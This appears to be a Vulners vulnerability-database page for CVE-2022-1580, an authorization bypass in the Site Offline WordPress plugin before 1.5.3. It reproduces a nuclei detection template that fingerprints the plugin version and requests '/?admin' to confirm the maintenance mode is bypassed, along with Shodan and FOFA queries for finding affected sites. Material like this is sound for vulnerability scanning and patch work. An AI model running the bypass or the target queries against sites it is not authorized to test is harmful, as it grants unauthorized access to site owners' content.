Lucene search
K

Site Offline WP Plugin < 1.5.3 - Authorization Bypass

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

Site Offline WP Plugin < 1.5.3 - Authorization Bypass. Prevents access to website except if specific keywords are included in the URL query string

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-1580
19 Sep 202214:15
attackerkb
Circl
CVE-2022-1580
19 Sep 202218:38
circl
CNNVD
WordPress plugin Site Offline 安全漏洞
19 Sep 202200:00
cnnvd
CVE
CVE-2022-1580
19 Sep 202214:00
cve
Cvelist
CVE-2022-1580 Site Offline < 1.5.3 - Access Bypass
19 Sep 202214:00
cvelist
EUVD
EUVD-2022-24871
3 Oct 202520:07
euvd
NVD
CVE-2022-1580
19 Sep 202214:15
nvd
OSV
CVE-2022-1580
19 Sep 202214:15
osv
Patchstack
WordPress Site Offline plugin <= 1.4.9 - Access Bypass vulnerability
29 Aug 202200:00
patchstack
Prion
Spoofing
19 Sep 202214:15
prion
Rows per page
id: CVE-2022-1580

info:
  name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass
  author: s4e-io
  severity: medium
  description: |
    The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
  impact: |
    Attackers can bypass the site offline/maintenance mode by adding specific keywords to the URL query string, gaining unauthorized access to the website.
  remediation: Fixed in 1.5.3
  reference:
    - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1580
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2022-1580
    cwe-id: CWE-639
    epss-score: 0.01299
    epss-percentile: 0.66883
    cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: freehtmldesigns
    product: "site_offline"
    framework: wordpress
    publicwww-query: "/wp-content/plugins/site-offline/"
    shodan-query: http.html:/wp-content/plugins/site-offline/
    fofa-query: body=/wp-content/plugins/site-offline/
  tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"

    matchers:
      - type: word
        internal: true
        words:
          - "Site Offline Or Coming Soon Or Maintenance Mode"

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/?admin"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "wp-block", "author")'
          - "status_code == 200"
          - "compare_versions(version, '< 1.5.3')"
        condition: and
# digest: 490a00463044022028f608c09e36bc26d53922cf1543d3d7313ee87b2be209822aefde00bcc68426022024a44c52bbfeb46ec7b0b88f573aeb7766b5e45a3a23a3f2ec98dfe96dab05d5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.14.3
EPSS0.01299
30